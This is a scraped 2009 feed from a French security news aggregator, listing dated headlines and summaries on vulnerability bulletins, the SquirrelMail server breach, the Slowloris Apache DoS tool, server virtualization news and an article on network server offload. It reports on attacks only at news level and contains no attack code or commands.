http://www.secuobs.com Observatoire de la securite Internet fr webmaster@secuobs.com 2009-07-02 22:01:20 - SearchSecurity Threat Monitor : Rogue DHCP server malware is a new twist on an old concept The good newsis that effective threat mitigation strategies exist; the bad news isthat many organizations haven't bothered to deploy themIMAGEIMAGEIMAGEhttp://www.secuobs.com/revue/news/116430.shtmlhttp://www.secuobs.com/revue/news/116430.shtml 2009-07-02 13:28:42 - Bulletins et Alertes de Sécurité SECURINFOS.INFO : Deux vulnérabilités ont été identifiées dans ARD-9808 DVR Card, quipourraient être exploitées par des personnes malintentionnées pourdivulguer des informations sensibles ou potentiellement compromettreun système vulnérablehttp://www.secuobs.com/revue/news/116248.shtmlhttp://www.secuobs.com/revue/news/116248.shtml 2009-07-02 11:57:17 - Global Security Mag Online : - Vulnérabilitéshttp://www.secuobs.com/revue/news/116220.shtmlhttp://www.secuobs.com/revue/news/116220.shtml 2009-07-02 01:16:23 - Security Park : Traditionally, organisations' network security relies mainly on theperimeter security enforcement, while encrypted web channels haveacted as a means to bypass the security functions Stonesoft hasintroduced the new StoneGate IPS-1030 appliance with the uniquecapability of inspecting encrypted web traffic This eliminates thetraditional blind spot in network protection The new appliance pmorehttp://www.secuobs.com/revue/news/116075.shtmlhttp://www.secuobs.com/revue/news/116075.shtml 2009-07-02 00:12:05 - News : IBM is bundling its x86 servers with VMware's newest virtualizationplatform, and offering financing packages to lower upfront costsread moreIMAGEhttp://www.secuobs.com/revue/news/116034.shtmlhttp://www.secuobs.com/revue/news/116034.shtml 2009-07-02 00:09:23 - 4sysops : Microsoft: We’re not gouging Europe on Windows 7 pricing Microsoft studyshows ’secret question’ password recovery is weak Get ready to deployWindows 7 and Windows Server 2008 R2 with Microsoft Deployment Toolkit2010 Beta 2 Event IDs for Windows Server 2008 and Vista RevealedCopyright © 2006-2009, 4sysops, Digital fingerprint:3db371642e7c3f4fe3ee9d5cf7666eb0http://www.secuobs.com/revue/news/116031.shtmlhttp://www.secuobs.com/revue/news/116031.shtml 2009-07-01 23:57:37 - Latest articles from SC Magazine US : Cybercriminals might be looking for a new home after their maliciousserver in the Cayman Islands was shut down TuesdayIMAGEIMAGEIMAGEhttp://www.secuobs.com/revue/news/116019.shtmlhttp://www.secuobs.com/revue/news/116019.shtml 2009-07-01 20:36:01 - WindowSecurity.com : How to track every event that is logged on a Windows Server 2008 andWindows Vista computerhttp://www.secuobs.com/revue/news/115978.shtmlhttp://www.secuobs.com/revue/news/115978.shtml 2009-07-01 15:29:36 - SAPIEN Technologies : There is an end to everything, to good things as well – Chaucer After aseveral wonderful years at SAPIEN Technologies, I regret to reportthat I will be moving on to new opportunities I’m looking forward tonew writing, training and speaking projects on Windows PowerShell andother Microsoft technologies I’m not really going far http://www.secuobs.com/revue/news/115823.shtmlhttp://www.secuobs.com/revue/news/115823.shtml 2009-06-30 21:35:25 - Bulletins et Alertes de Sécurité SECURINFOS.INFO : HP a reconnu différentes vulnérabilités dans HP-UX, qui pourraient êtreexploitées par des personnes malintentionnées pour divulguer desinformations sensibles, conduire des attaques cross-site scripting,causer un Déni de Service DoS, ou compromettre un systèmevulnérablehttp://www.secuobs.com/revue/news/115459.shtmlhttp://www.secuobs.com/revue/news/115459.shtml 2009-06-30 20:58:32 - WhatIs Word of the Day : Server virtualization is the masking of server resources, including thenumber and identity of individual physical servers, processors, andoperating systems, from server usersIMAGEIMAGEIMAGEhttp://www.secuobs.com/revue/news/115426.shtmlhttp://www.secuobs.com/revue/news/115426.shtml 2009-06-30 19:56:15 - Global Security Mag Online : - Vulnérabilitéshttp://www.secuobs.com/revue/news/115358.shtmlhttp://www.secuobs.com/revue/news/115358.shtml 2009-06-30 19:56:15 - Global Security Mag Online : - Vulnérabilitéshttp://www.secuobs.com/revue/news/115350.shtmlhttp://www.secuobs.com/revue/news/115350.shtml 2009-06-30 17:27:05 - Les derniers documents du CERTA. : Plusieurs vulnérabilités de HP-UX Apache Web Server Suite permettent deréaliser un déni de service à distance et d'exécuter du codearbitraire à distancehttp://www.secuobs.com/revue/news/115313.shtmlhttp://www.secuobs.com/revue/news/115313.shtml 2009-06-30 16:18:58 - Governmentsecurity.org : SQL Server 2005 provides easier functions for encrypting anddecrypting user sensitive information such as credit card numbers orbank account details, so as to deter any hacking attemptsData encryption in SQL Server 2005 can be done either by usingpassword mechanism or by making use of keys and certificates Thesemethods are as follows:1Encryption by PassPhraseThis is a simple method in which we use the SQL methodEncryptByPassPhrase'password','original_value' with ourinsert,update,select queriesread moreIMAGE IMAGE IMAGE IMAGEIMAGEhttp://www.secuobs.com/revue/news/115263.shtmlhttp://www.secuobs.com/revue/news/115263.shtml 2009-06-29 19:47:43 - milw0rm.com : http://www.secuobs.com/revue/news/114923.shtmlhttp://www.secuobs.com/revue/news/114923.shtml 2009-06-29 19:19:37 - The Academy Pro : Let’s begin the week with a Tenable Network Security video Today’s videofocuses on discovering SSH servers with the Passive VulnerabilityScanner that Tenable has incorporated into their enterprise productline Don’t forget to view the 400+ videos in the video directorycategorized by technology After you login to the video page simplyclick on the http://www.secuobs.com/revue/news/114877.shtmlhttp://www.secuobs.com/revue/news/114877.shtml 2009-06-29 10:48:36 - Raymond.CC Blog : 3 years ago when I worked on a government project, one of theirrequirements was to create a jukebox server I seriously had no ideawhat exactly they wanted but I guessed it’s something where theemployees is able to connect to the server and then listen to songsAfter a little research, I http://www.secuobs.com/revue/news/114758.shtmlhttp://www.secuobs.com/revue/news/114758.shtml 2009-06-29 02:47:02 - Metasploit : Add detection of Windows Storage Server 2008http://www.secuobs.com/revue/news/114690.shtmlhttp://www.secuobs.com/revue/news/114690.shtml 2009-06-28 17:06:13 - Office of Inadequate Security : Security researchers have found a treasure chest of FTP passwords, somefrom high profile sites, on an open cybercrime server JacquesErasmus, CTO at security tools firm Prevx, stumbled across a sitewhere a Trojan is uploading FTP login credentials captured fromcompromised machines So far, Erasmus has found logins forftpbbccouk, ftpciscocom, ftpamazoncom, ftpmonstercom and,http://www.secuobs.com/revue/news/114623.shtmlhttp://www.secuobs.com/revue/news/114623.shtml 2009-06-28 14:27:26 - Harmony Security Blog : http://www.secuobs.com/revue/news/114582.shtmlhttp://www.secuobs.com/revue/news/114582.shtml 2009-06-27 03:02:34 - Hack In The Box : It has just become apparent that, on June 16, attackers hacked into theweb server of the SquirrelMail open source project The operators havesuspended all accounts and reset all crucial passwords Access to theoriginal server and to all the available plug-ins has also beendisabled The operators believe that none of the plug-ins has beencompromised, but investigations are still in progress Third partyplug-ins can be used to add features to SquirrelMail It is currentlyunknown as to how the intruders hacked into the server According tothe server operators, the SquirrelMail web mailer's source code wasnot accessible at any time because it is located on a differentserver However, phishers are currently trying to convince usersotherwise with a spamming campaign In an email, they claim thatversions 1411, 1412 and 1413 contain a back door, and thatversion 1415 has, therefore, been made available to downloadhttp://www.secuobs.com/revue/news/114360.shtmlhttp://www.secuobs.com/revue/news/114360.shtml 2009-06-27 01:55:08 - 4sysops : If you pre-order Win 7 now, then you can save 50% This offer is onlyavailable for a few days limited number of copies Windows 7pre-orders grab Amazon’s top sales spots Microsoft plans Windows 7upgrade version for Europe Microsoft offering $100 Technet discounttill July 3 Is Microsoft silently building a better VDI http://www.secuobs.com/revue/news/114316.shtmlhttp://www.secuobs.com/revue/news/114316.shtml 2009-06-26 23:25:07 - Rootsecure.net : H Security: SquirrelMail open source project's web server hackedhttp://www.secuobs.com/revue/news/114295.shtmlhttp://www.secuobs.com/revue/news/114295.shtml 2009-06-26 19:31:18 - ISN InfoSec News Mailing List : InfoSec News: Cyber Command: Observers worry about unintendedconsequences:http://fcwcom/articles/2009/06/25/cyber-command-dod-nsaaspxBy John S Monroe FCWcom June 25, 2009The Defense Department’s new US Cyber Command is now thecybersecurity heavyweight in the government division, according tonumerous media accounts http://www.secuobs.com/revue/news/114174.shtmlhttp://www.secuobs.com/revue/news/114174.shtml 2009-06-26 19:03:35 - Packet Storm Security Headlines : http://www.secuobs.com/revue/news/114157.shtmlhttp://www.secuobs.com/revue/news/114157.shtml 2009-06-26 18:57:37 - myf00 : While there are many GoF patterns, there are only two that I use andabuse The Observer and the Singleton pattern The following is theimplementation and declaration of the CSingleton class in thesingletonh file /* * Copyright c 2009 Duarte Silva * All RightsReserved * * This program is free software; you can http://www.secuobs.com/revue/news/114153.shtmlhttp://www.secuobs.com/revue/news/114153.shtml 2009-06-26 17:36:21 - Global Security Mag Online : - Vulnérabilitéshttp://www.secuobs.com/revue/news/114101.shtmlhttp://www.secuobs.com/revue/news/114101.shtml 2009-06-26 15:12:31 - Bulletins et Alertes de Sécurité SECURINFOS.INFO : Deux vulnérabilités ont été identifiées dans IBM Rational ClearQuest, quipourraient être exploitées par des personnes malintentionnées pourconduire des attaques cross-site scripting et divulguer desinformations sensibleshttp://www.secuobs.com/revue/news/114071.shtmlhttp://www.secuobs.com/revue/news/114071.shtml 2009-06-26 15:12:31 - Bulletins et Alertes de Sécurité SECURINFOS.INFO : Une vulnérabilité a été rapportée dans Unisys Business InformationServer, qui pourrait être exploitée par des personnes malintentionnéesafin de compromettre un système vulnérablehttp://www.secuobs.com/revue/news/114062.shtmlhttp://www.secuobs.com/revue/news/114062.shtml 2009-06-26 14:04:49 - Global Security Mag Online : - Vulnérabilitéshttp://www.secuobs.com/revue/news/114019.shtmlhttp://www.secuobs.com/revue/news/114019.shtml 2009-06-26 02:34:20 - Packet Storm Security Exploits : AlumniServer version 101 suffers from a remote SQL injectionvulnerability that allows for authentication bypasshttp://www.secuobs.com/revue/news/113875.shtmlhttp://www.secuobs.com/revue/news/113875.shtml 2009-06-26 02:34:20 - Packet Storm Security Exploits : Blind SQL injection exploit for AlumniServer version 101http://www.secuobs.com/revue/news/113874.shtmlhttp://www.secuobs.com/revue/news/113874.shtml 2009-06-25 22:28:41 - milw0rm.com : http://www.secuobs.com/revue/news/113801.shtmlhttp://www.secuobs.com/revue/news/113801.shtml 2009-06-25 22:28:41 - milw0rm.com : http://www.secuobs.com/revue/news/113800.shtmlhttp://www.secuobs.com/revue/news/113800.shtml 2009-06-25 22:26:41 - iDefense Public Vulnerability Disclosures : http://www.secuobs.com/revue/news/113798.shtmlhttp://www.secuobs.com/revue/news/113798.shtml 2009-06-25 18:21:14 - WindowSecurity.com : Kaspersky Security for Mail Server was selected the winner in the EmailAnti Virus category of the WindowSecuritycom Readers' Choice AwardsSymantec AntiVirus for Messaging and BitDefender Security were firstrunner-up and second runner-up respectivelyhttp://www.secuobs.com/revue/news/113719.shtmlhttp://www.secuobs.com/revue/news/113719.shtml 2009-06-25 01:57:26 - Systm Large Quicktime : Now that you've got your movies encoded, we show you how to distributethem over your home networkhttp://www.secuobs.com/revue/news/113417.shtmlhttp://www.secuobs.com/revue/news/113417.shtml 2009-06-25 01:49:42 - Computer Security News : One of the potentially most dangerous emerging security threats to theInternet isn't even showing up on antivirus radarhttp://www.secuobs.com/revue/news/113394.shtmlhttp://www.secuobs.com/revue/news/113394.shtml 2009-06-25 00:31:36 - 4sysops : Check out the New Windows 7 Packaging Why do people still want softwareis plastic boxes Download of Microsoft Security Essentials Beta hasbeen closed But you can still get it here: RSAT and ADUC for Vista –Update to add tabs for Terminal Services Profile, Environment,Sessions, and Remote Control Aero Glass Remoting in http://www.secuobs.com/revue/news/113351.shtmlhttp://www.secuobs.com/revue/news/113351.shtml 2009-06-24 20:37:30 - 3128 PROXY : A vast list of highly secure and always working proxies that help usbrowse the Internet anonymously and for free without leaving anytraces behind http://www.secuobs.com/revue/news/113223.shtmlhttp://www.secuobs.com/revue/news/113223.shtml 2009-06-24 20:35:40 - Global Security Mag Online : - Vulnérabilitéshttp://www.secuobs.com/revue/news/113219.shtmlhttp://www.secuobs.com/revue/news/113219.shtml 2009-06-24 17:57:39 - Les derniers documents du CERTA. : De multiples vulnérabilités ont été corrigées dans OCS Inventory NGServerhttp://www.secuobs.com/revue/news/113185.shtmlhttp://www.secuobs.com/revue/news/113185.shtml 2009-06-24 16:45:46 - Governmentsecurity.org : The operators have disabled the access to all plug-ins to check forpotential manipulations Reportedly, SquirrelMail's source code hasnot been compromisedIMAGE IMAGE IMAGE IMAGEIMAGEhttp://www.secuobs.com/revue/news/113134.shtmlhttp://www.secuobs.com/revue/news/113134.shtml 2009-06-24 09:21:20 - Hak5 Large Xvid : Building the ultimate white box ESXi server for under $2000 Can it bedone Darren and Matt grab the company credit card and answer thatquestionhttp://www.secuobs.com/revue/news/113025.shtmlhttp://www.secuobs.com/revue/news/113025.shtml 2009-06-24 00:12:05 - 4sysops : Submitted by David Homer XIA Configuration provides a centralisedmanagement system for the inventory and technical documentation ofyour network infrastructure The Configuration Client can be deployedas a Windows Service which can then use several methods to detect anddocument Windows Servers, Windows Workstations, DNS Services, SQLInstances etc Reports can be quickly generated for items saving http://www.secuobs.com/revue/news/112882.shtmlhttp://www.secuobs.com/revue/news/112882.shtml 2009-06-23 23:35:54 - BadwareBusters.org Most recent topics : We’re a small company and we were hacked sometime last year We havesuccessfully prevented further similar hacks we think, but we stillneed to make 100% that nothing has been left lingering from thesuccessful hack We also want as clean a system as possible, forobvious reasons :I’m unfortunately a bit of a newb, but it’s fallen to me to get up tospeed as quickly as possibleI was hoping somebody here might be prepared to take a look at aHijackThis or RunScanner log file Not sure if this is a good placeto come to ask for such helpThanks a lot,- Johnnyhttp://www.secuobs.com/revue/news/112863.shtmlhttp://www.secuobs.com/revue/news/112863.shtml 2009-06-23 21:11:01 - Biometrics Resource findBIOMETRICS.com : REDWOOD SHORES, Calif, Communication Intelligence Corporation"CIC",http://www.secuobs.com/revue/news/112846.shtmlhttp://www.secuobs.com/revue/news/112846.shtml 2009-06-23 19:33:02 - Global Security Mag Online : - Vulnérabilitéshttp://www.secuobs.com/revue/news/112747.shtmlhttp://www.secuobs.com/revue/news/112747.shtml 2009-06-23 16:55:13 - Bulletins et Alertes de Sécurité SECURINFOS.INFO : mu-b a découvert une vulnérabilité dans Bopup Communication Server, quipourrait être exploitée par des personnes malintentionnées pour causerun Déni de Service DoS ou compromettre un système vulnérablehttp://www.secuobs.com/revue/news/112699.shtmlhttp://www.secuobs.com/revue/news/112699.shtml 2009-06-23 15:24:41 - BadwareBusters.org Most recent topics : I have 2 server on which We host various website for client But Ifound every site have Malware How to remove that onehttp://www.secuobs.com/revue/news/112660.shtmlhttp://www.secuobs.com/revue/news/112660.shtml 2009-06-23 13:17:21 - Network World on Security : An unknown number of proxy servers set up in recent days are being usedto help Iranians to maintain access to unfiltered Web content amid acrackdown over protests in the countryhttp://www.secuobs.com/revue/news/112646.shtmlhttp://www.secuobs.com/revue/news/112646.shtml 2009-06-22 23:58:46 - milw0rm.com : http://www.secuobs.com/revue/news/112418.shtmlhttp://www.secuobs.com/revue/news/112418.shtml 2009-06-22 19:56:45 - milw0rm.com : http://www.secuobs.com/revue/news/112331.shtmlhttp://www.secuobs.com/revue/news/112331.shtml 2009-06-22 19:41:30 - Security Bloggers Network : Half of the servers of the internet are using Apache open sourceservers They can now be brought down by a simple linux-pc that uses aprogram that will attack only the webserver function in such a waythat it will become unavailable for all others There is no realmitigation and if you read the conclusions by the Internet StormCenter even those solutions should be used with caution as they allhave serious side effectsThe biggest webservices will have enough defenses and back-up orfailover and those that are running IIS can go one securing andpatching their servers with other stuff but those with vulnerableservers such as Apache and Squid should get to workThere is no really simple solution You will have to thinkconceptually and look at your infrastructure and your business planand objectives Every measure you will take will have its costs and/orimplications for your visitors and users or clientsThe public release of this tool is based upon a problem that has beenwritten about since 2005 and has been proven to work since 2007 andabout which nothing was done - probably because one thought that noone would do the old hat DDOS stuff anymoreBut that is what changed since last year with the massive DDOS attacksagainst countries Georgia, Estonia, or Tibetian dissidents orthe sites of the Iranian government now DDOS has become so simplethat it has become very popular It is also difficult to prosecutesomeone for a DDOS because if you are with many, they won't arresteveryone of them - if they can find them anyway because the firstthing one does during a DDOS attack is try to drop the trafficSo anyone who knows how to install a phyton program on a linux box cannow take out any website that is using apache 1 or 2 or squid and someothers THe IIS servers are NOT vulnerable yet http://iscsansorg/diaryhtmlstoryid=6613 You will read here howdifficult it is to defend against such an attack if you didn't investheavily in failover and proxying and fastload and stuff like thathttp://hackersorg/slowloris/ this is a must readIMAGE IMAGE IMAGE IMAGE IMAGE IMAGEhttp://www.secuobs.com/revue/news/112317.shtmlhttp://www.secuobs.com/revue/news/112317.shtml 2009-06-22 15:30:44 - MS Digest IIS Exchange : Couldn’t resist anymore, I’ve bought myself a Fujitsu Scaleo Home Serverbased on Windows Home Server The server is the 2 generation WHS fromFujitsu and it was just to cheap approx 360$ to resist anymore,apparently Fujitsu has dumped their prices this spring with like 50%I like the idea of having the IMAGEhttp://www.secuobs.com/revue/news/112219.shtmlhttp://www.secuobs.com/revue/news/112219.shtml 2009-06-22 04:24:13 - Hack In The Box : Good hackers today are businesspeople, assessing each target for thesimplest and most profitable attack scenarios These days, there areprobably no plumper targets than enterprise databases Databases housecompanies' easiest-to-sell confidential data: customer lists, payrollrecords, and many other structured inventories of sensitiveinformation Database administrators tend not to be steeped insecurity practices, and the databases themselves are frequently tiedto Web applications that have turned out to be easy to hack In itsannual breach study, Verizon Business' computer forensics teamreported that databases made up 30% of data compromises in 2008Worse, database breaches accounted for 75% of all records reportedbreached Because sensitive information is often found in a singledatabase, a single breach can lead to major damagehttp://www.secuobs.com/revue/news/112124.shtmlhttp://www.secuobs.com/revue/news/112124.shtml 2009-06-21 18:34:58 - 3128 PROXY : Find a big list of dependable and highly secure server proxies for freeThe list has been updated everydayhttp://www.secuobs.com/revue/news/112029.shtmlhttp://www.secuobs.com/revue/news/112029.shtml 2009-06-20 11:34:29 - Vigil@nce vulnérabilités publiques : Une vulnérabilité de PDF Distiller permet à un attaquant de mener un dénide service ou de faire exécuter du code dans BlackBerry EnterpriseServerhttp://www.secuobs.com/revue/news/111843.shtmlhttp://www.secuobs.com/revue/news/111843.shtml 2009-06-20 00:41:50 - Cisco Security AdvisoriesSearch Cisco : A vulnerability exists in the IOS HTTP server in which HTML code insertedinto dynamically generated output, such as the output from a showbuffers command, will be passed to the browser requesting the pageThis HTML code could be interpreted by the client browser andpotentially execute malicious commands against the device or otherpossible cross-site scripting attacks Successful exploitation of thisvulnerability requires that a user browse a page containing dynamiccontent in which HTML commands have been injectedIMAGEhttp://www.secuobs.com/revue/news/111757.shtmlhttp://www.secuobs.com/revue/news/111757.shtml 2009-06-19 07:29:04 - News : Citrix Systems has announced the availability of Citrix XenServer 55,a free server virtualization hypervisor based on the open source Xenprojectread moreIMAGEhttp://www.secuobs.com/revue/news/111462.shtmlhttp://www.secuobs.com/revue/news/111462.shtml 2009-06-18 18:04:15 - MX Logic Security News : The mad grab for the newest version of Apple's iPhone won't begin inearnest until the iPhone 3G S is released on Friday But a flood ofcurrent iPhone users looking to download the newest operating system,iPhone OS 30, crashed the activation server at the iTunes store onWednesdayApple simultaneously released patches for 46 security vulnerabilitiesin the OS 30 which, if left unpatched, could allow hackers to executemalicious code through maliciously crafted images or PDF filesAfter the operating system became available for download on the iTunesonline store, many users reported being able to successfully downloadthe upgrade, but were unable to activate the OS on their phonesDisgruntled users received an error message that the iPhone activationserver was temporarily unavailableThe update is available for free for owners of the original iPhone andiPhone 3G, but iPod Touch owners have to pay $995 for the updateHowever, security experts warned that Touch users should get theupgrade to fix security holes in its operating system that werepatched yesterdayADNFCR-1765-ID-19225603-ADNFCRhttp://www.secuobs.com/revue/news/111212.shtmlhttp://www.secuobs.com/revue/news/111212.shtml 2009-06-18 15:06:07 - Help Net Security News : Centrify announced the Centrify Suite 2008 for Linux on IBM System z, thefirst Linux supported as a guest OS is SUSE Linux Enterprise Serverfor System z With Centrify Suite, enterprises can secure http://www.secuobs.com/revue/news/111169.shtmlhttp://www.secuobs.com/revue/news/111169.shtml 2009-06-18 15:06:07 - Help Net Security News : Designed to facilitate information access, TeamViewer has optimised itsTeamViewer software, which offers a secure, easy to use, permanentconnection to servers and computers Running the TeamViewer Hhttp://www.secuobs.com/revue/news/111168.shtmlhttp://www.secuobs.com/revue/news/111168.shtml 2009-06-17 19:25:26 - milw0rm.com : http://www.secuobs.com/revue/news/110833.shtmlhttp://www.secuobs.com/revue/news/110833.shtml 2009-06-17 15:45:19 - News : Dell on Wednesday said it would offer pre-configured systems forenterprise customers looking to get server environments up and runningquicklyread moreIMAGEhttp://www.secuobs.com/revue/news/110726.shtmlhttp://www.secuobs.com/revue/news/110726.shtml 2009-06-17 15:11:31 - Security : One of the tasks of an enterprise architect is to design a frameworkatop which developers can implement and deploy applicationsconsistently and easily The consistency is important for internalbusiness continuity and reuse; common objects, operations, andprocesses can be reused across applications to make development andintegration with other applications and systems easier Architectsalso often decide where functionality resides and design the baseapplication infrastructure framework Application server, identitymanagement, messaging, and integration are all often a part of sucharchitecture designsRarely does the architect concern him/herself with the networkinfrastructure, as that is the purview of “that group”; the “you knowwho I’m talking about” group And for the most part there’s no needfor architects to concern themselves with network-orientedarchitecture Applications should not need to know on which VLAN theywill be deployed or what their default gateway might be But whatarchitects might need to know – and probably should know – is whetherthe network infrastructure supports “server offload” of someapplication functions or not, and how that can benefit theirenterprise architecture and the applications which will be deployedatop it---------------------------------------------------------------------WHAT IT IS---------------------------------------------------------------------relayracebaton Server offload is a generic term used by the networkingindustry to indicate some functionality designed to improve theperformance or security of applications We use the term “offload”because the functionality is “offloaded” from the server and moved toan application network infrastructure device instead Server offloadworks because the application network infrastructure is almost alwaysthese days deployed in front of the web/application servers and is infact acting as a broker proxy between the client and the serverServer offload is generally offered by load balancers and applicationdelivery controllersYou can think of server offload like a relay race The applicationnetwork infrastructure device runs the first leg and then hands offthe baton the request to the server When the server is finished,the application network infrastructure device gets to run another leg,and then the race is done as the response is sent back to the clientThere are basically two kinds of server offload functionality:1 Protocol processing offloadProtocol processing offload includes functions like SSLtermination and TCP optimizations Rather than enable SSLcommunication on the web/application server, it can be “offloaded”to an application network infrastructure device and shared acrossall applications requiring secured communications Offloading SSLto an application network infrastructure device improvesapplication performance because the device is generally optimizedto handle the complex calculations involved in encryption anddecryption of secured data and web/application servers are notTCP optimization is a little different We say TCP sessionmanagement is “offloaded” to the server but that’s really not whathappens as obviously TCP connections are still opened, closed, andmanaged on the server as well Offloading TCP session managementmeans that the application network infrastructure is managing theconnections between itself and the server in such a way as toreduce the total number of connections needed without impactingthe capacity of the application This is more commonly referred toas TCP multiplexing and it “offloads” the overhead of TCPconnection management from the web/application server to theapplication network infrastructure device by effectively giving upcontrol over those connections By allowing an application networkinfrastructure device to decide how many connections to maintainand which ones to use to communicate with the server, it canmanage thousands of client-side connections using merely hundredsof server-side connections Reducing the overhead associated withopening and closing TCP sockets on the web/application serverimproves application performance and actually increases the usercapacity of servers TCP offload is beneficial to all TCP-basedapplications, but is particularly beneficial for Web 20applications making use of AJAX and other near real-timetechnologies that maintain one or more connections to the serverfor its functionalityProtocol processing offload does not require any modifications tothe applications2 Application-oriented offloadApplication-oriented offload includes the ability to implementshared services on an application network infrastructure deviceThis is often accomplished via a network-side scriptingcapability, but some functionality has become so commonplace thatit is now built into the core features available on applicationnetwork infrastructure solutionsApplication-oriented offload can include functions like cookieencryption/decryption, compression, caching, URI rewriting, HTTPredirection, DLP Data Leak Prevention, selective dataencryption, application security functionality, and datatransformation When network-side scripting is available,virtually any kind of pre or post-processing can be offloaded tothe application network infrastructure and thereafter shared withall applicationsnetwork-side-scriptingApplication-oriented offload works becausethe application network infrastructure solution is mediatingbetween the client and the server and it has the ability toinspect and manipulate the application dataThe benefits of application-oriented offload are that the servicesimplemented can be shared across multiple applications and in manycases the functionality removes the need for the web/applicationserver to handle a specific request For example, HTTP redirectioncan be fully accomplished on the application networkinfrastructure device HTTP redirection is often used as a meansto handle application upgrades, commonly mistyped URIs, or as partof the application logic when certain conditions are metApplication security offload usually falls into this categorybecause it is application – or at least application data –specific Application security offload can include scanning URIsand data for malicious content, validating the existence ofspecific cookies/data required for the application, etc… This kindof offload improves server efficiency and performance but a biggerbenefit is consistent, shared security across all applications forwhich the service is enabledSome application-oriented offload can require modification to theapplication, so it is important to design such features into theapplication architecture before development and deployment Whileit is certainly possible to add such functionality into thearchitecture after deployment, it is always easier to do so at thebeginning---------------------------------------------------------------------WHY YOU NEED IT---------------------------------------------------------------------Server offload is a way to increase the efficiency of servers andimprove application performance and security Server offload increasesefficiency of servers by alleviating the need for the web/applicationserver to consume resources performing tasks that can be performedmore efficiently on an application network infrastructure solutionThe two best examples of this are SSL encryption/decryption andcompression Both are CPU intense operations that can consume 20-40%of a web/application server’s resources By offloading these functionsto an application network infrastructure solution, servers “reclaim”those resources and can use them instead to execute application logic,serve more users, handle more requests, and do so fasterServer offload improves application performance by allowing theweb/application server to concentrate on what it is designed to do:serve applications and putting the onus for performing ancillaryfunctions on a platform that is more optimized to handle thosefunctions Server offload provides these benefits whether you have atraditional client-server architecture or have moved or are movingtoward a virtualized infrastructure Applications deployed on virtualservers still use TCP connections and SSL and run applications andtherefore will benefit the same as those deployed on traditionalserversFollow me on Twitter IMAGEView Lori's profile on SlideShareIMAGEIMAGE IMAGEfriendfeedicon_facebook AddThis Feed ButtonBookmark and ShareTechnorati Tags: MacVittie,F5,server offload,virtualization,security,web20,TCP,optimization,acceleration,network-side scripting,transformation,inspection,proxy,broker,performance,SSL,architecture,architect,services,web,internet,blog,loadbalancing,application deliveryRelated blogs et articles:* I am wondering why not all websites enabling this great featureGZIP* 3 Really good reasons you should use TCP multiplexing* SOA et Web 20: The Connection Management Challenge* Understanding network-side scripting* I am in your HTTP headers, attacking your application* Infrastructure 20: As a matter of fact that isn't what it meansIMAGEhttp://www.secuobs.com/revue/news/110703.shtmlhttp://www.secuobs.com/revue/news/110703.shtml 2009-06-17 08:18:48 - SANS Internet Storm Center, InfoCON green : Lately, I have been writing new labs for an update version of my DEV 422Defending web app course O morehttp://www.secuobs.com/revue/news/110598.shtmlhttp://www.secuobs.com/revue/news/110598.shtml 2009-06-17 07:07:51 - 8080 PROXY : A huge list of highly secure, multifunctional servers that help browsethe Internet anonymously without leaving any traces behindhttp://www.secuobs.com/revue/news/110579.shtmlhttp://www.secuobs.com/revue/news/110579.shtml 2009-06-16 20:23:21 - eSecurity Planet News : Virtually all data loss occurs on servers A new company releases a pubicbeta for anti-malwarehttp://www.secuobs.com/revue/news/110381.shtmlhttp://www.secuobs.com/revue/news/110381.shtml 2009-06-16 19:31:04 - SearchVMware.com VMware tips and tricks : Citrix Systems hopes to gain server virtualization market share withXenServer 55, free virtualization software that offers ActiveDirectory integration and support for several operating systemsIMAGEIMAGEIMAGEhttp://www.secuobs.com/revue/news/110327.shtmlhttp://www.secuobs.com/revue/news/110327.shtml 2009-06-16 19:24:39 - BreakingPoint Labs Blog : This morning we published our latest methodology for realistic testingof server load balancers Server load balancers are such an integralpiece of networking equipment and the adoption of virtualization andcloud computing, as well as the overall increase of network load, havemade them an even hotter topic As with our firewall testing and IPStesting methodologies, the server load balancer testing methodologydemonstrates, in great detail including screenshots, how to configurea load balancer and set up the testing toolsSome highlights from the methodology:* Testing the number of TCP connections per second the load balanceris able to handle, providing a baseline test of the device’sperformance capabilities* Emulating blended Layer 4-7 application traffic in order tovalidate that the load balancer can handle a true networkscenario* Determining the overall bandwidth the load balancer can supportthrough testing the number of HTTP/HTTPs connections per secondthe device can handle* Simulating dynamic pages and image files to validate HTTP Cachingperformance and confirm the load balancer is locally cachingneeded files* Confirming the load balancer can handle malformed packets orerrors with the packet through application fuzzing* Testing RFCs 793, 1945, 2616, 2818, and 3501In the news release that went out today the quote from our CTO andco-founder, Dennis Cox summed it up nicely:“Server load balancers are so important to today’s networkinfrastructure, helping to provide improved service uptime,redundancy and better application performance In order to makethis happen, server load balancers must have a high level ofawareness of application protocols traversing the network, providelocal caching and handle a significant amount of simultaneous TCPconnections Now add onto this the influx of virtualization, andtoday’s server load balancers have become highly complexcontent-aware devices that help to optimize your network and theapplications it is running Yet traditional testing methodologies,which only call for testing with HTTP traffic, are still beingused""Simply testing server load balancers with HTTP is unsuitable andirresponsible True performance and security testing requiresrealistic and blended application traffic, appropriate throughputand even anomalies such as application fuzzing The more realistictesting you do today, the better performing and more secure serverload balancer you’ll see tomorrow”Go check out the Server Load Balancer testing methodology and let usknow what you thinkIMAGEIMAGEhttp://www.secuobs.com/revue/news/110307.shtmlhttp://www.secuobs.com/revue/news/110307.shtml 2009-06-16 16:20:25 - toutcnis : En simplifiant à l’extrême, BES 50 BlackBerry Enterprise Server, RIMréinvente des services qui existent depuis des lustres dans le domainedes serveurs de fichiers A commencer par une console d’administrationWeb unifiée, qui envoie au rancart l’ancienne application sous Win32et ses nécessaires corvées de mise à jour Ajoutons à cela une gestiondes droits et des groupes plus « granulaire » et une architectureredondante http://www.secuobs.com/revue/news/110233.shtmlhttp://www.secuobs.com/revue/news/110233.shtml 2009-06-16 08:59:00 - Reverse Engineering : submitted by anonsubmilink 1 commenthttp://www.secuobs.com/revue/news/110144.shtmlhttp://www.secuobs.com/revue/news/110144.shtml 2009-06-15 17:09:29 - Vigil@nce vulnérabilités publiques : Plusieurs vulnérabilités sont corrigées dans le CPU d'avril 2009http://www.secuobs.com/revue/news/109813.shtmlhttp://www.secuobs.com/revue/news/109813.shtml 2009-06-14 21:47:50 - DebugInfo.com Oleg Starodumov : I have added a new category to my web site - Debugging Tips:http://wwwdebuginfocom/tipshtmlHere is the first tip:http://wwwdebuginfocom/tips/symsrvexlisthtmlThis tip shows how to improve the startup time of our debuggingsessions by excluding some modules from symbol server search It canbe especially useful for applications that use 3rd party componentswhose symbols are not available on Microsoft symbol serverIMAGEhttp://www.secuobs.com/revue/news/109598.shtmlhttp://www.secuobs.com/revue/news/109598.shtml 2009-06-14 21:47:50 - DebugInfo.com Oleg Starodumov : New tool 